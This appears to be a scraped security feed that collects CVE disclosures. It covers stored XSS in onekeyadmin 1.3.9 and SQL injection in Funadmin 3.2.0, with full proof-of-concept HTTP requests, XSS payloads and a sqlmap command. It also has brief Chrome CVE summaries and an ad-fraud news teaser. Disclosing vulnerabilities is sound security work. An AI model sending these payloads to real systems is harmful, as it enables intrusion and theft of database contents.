onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Menu module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#adminMenu/index

poc  
POST /admin1/adminMenu/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 145  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/adminMenu/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#adminMenu/index

CVE-2023-26952: Background menu rules - add menu has storage xss vulnerability · Issue #7 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Title parameter under the Adding Categories module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#catalog/index

poc POST /admin1/catalog/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 334 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/catalog/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo\_url":"test","bind\_html":"","group\_id":\[\],"links\_type":0,"links\_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo\_title":"","seo\_keywords":"","seo\_description":"","field":\[\],"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#catalog/index

CVE-2023-26950: Background category management - adding categories has a storage xss vulnerability · Issue #9 · keheying/onekeyadmin

Categories: Threat Intelligence
A network of online video streaming sites are monetizing traffic with hidden ads. The problem? Advertisers are throwing up to a million dollars every month down the drain as nobody is even seeing the ads.



(Read more...)




The post DeepStreamer: Illegal movie streaming platforms hide lucrative ad fraud operation appeared first on Malwarebytes Labs.

DeepStreamer: Illegal movie streaming platforms hide lucrative ad fraud operation

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/columns.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php columns-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#columns method  
  

Get the id directly and splice it into the sql statement

Vulnerability recurrence  
sqlmap poc save as txt  
GET /databases/table/columns?id=* HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close  
python sqlmap.py -r poc.txt  
  
GET /databases/table/columns?id='+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close

CVE-2023-24780: Database management plug-in table.php columns-sql injection vulnerability · Issue #6 · funadmin/funadmin

Inappropriate implementation in Intents in Google Chrome on Android prior to 111.0.5563.64 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low)

CVE-2023-1234

Inappropriate implementation in WebApp Installs in Google Chrome on Android prior to 111.0.5563.64 allowed an attacker who convinced a user to install a malicious WebApp to spoof the contents of the PWA installer via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-1230

Type confusion in DevTools in Google Chrome prior to 111.0.5563.64 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted UI interaction. (Chromium security severity: Low)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-1235: Stable Channel Update for Desktop

Use after free in Swiftshader in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-1213

Inappropriate implementation in Permission prompts in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-1229

Type confusion in V8 in Google Chrome prior to 111.0.5563.64 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#chrome